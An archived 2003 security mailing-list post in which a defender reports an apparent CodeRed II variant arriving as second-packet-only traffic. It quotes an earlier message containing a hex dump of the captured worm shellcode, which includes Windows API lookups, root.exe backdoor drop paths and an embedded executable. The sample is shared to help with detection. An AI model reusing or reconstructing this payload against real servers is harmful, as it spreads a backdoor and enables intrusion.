As I see it did make it to the list, here an update. The reason this packet hasn't been tripping the usual signatures is simple. We are receiving *only* the second packet. There is no first packet with GET /default.ida?XXXX etc. The packet itself appears to be classic CodeRed (II I believe), but again, we're getting only the second packet. No TCP 3-way, for first packet. While keeping our eyes on this, the majority appears to be coming from China, but we do some domestic (USA), Turkey, and I believe a Brazilian. I'm curious if anyone else is seeing these second-packet-only CodeReds. Regards, Frank On Fri, 2003-04-25 at 13:55, Frank Knobbe wrote: > Greetings, > > we've been picking up some oddities since yesterday which look like a > new CodeRed variant. Traditional signatures didn't identify it as such, > but looking at the payload, it appears to be a CodeRed'ish type of bug. > We're starting a trap for a complete session now. (So far have only > isolated packets). > > That isolated packet is below. I'll post the complete session once we > catch the whole thing. > > Has anyone else seen this? > > Regards, > Frank > > ---8<--- > > 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80 > TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF > ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20 > 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C > 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U > F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat > 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ > 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. > E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. > FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy > 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. > 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL > 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc > 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... > 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u > BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct > 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E > A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u > BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele > 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... > 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. > 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. > 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna > 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... > 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. > 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA > 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. > FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 > 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... > 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. > 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... > 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... > C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. > C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ > E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ > E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... > FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ > FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. > 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ > 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. > 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. > BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. > 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... > 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr > 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... > 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. > 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ > 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ > 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. > 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... > 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... > FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... > 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L > 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... > 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ > 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... > 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. > 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... > 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ > 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... > 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... > 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ > 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ > 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ > 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. > 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... > 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ > 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. > 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ > 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... > FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ > FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ > FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ > 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h > D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. > 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. > 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 > 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j > 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... > 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h > 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... > 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@..........h.$@.h > 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... > E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L > 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h > B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. > 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j > 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... > 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ > 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.........h.$@.h. > 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ > 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. > C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. > 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... > 40 00 89 35 @..5
This archive was generated by hypermail 2b30 : Tue Apr 29 2003 - 14:55:59 PDT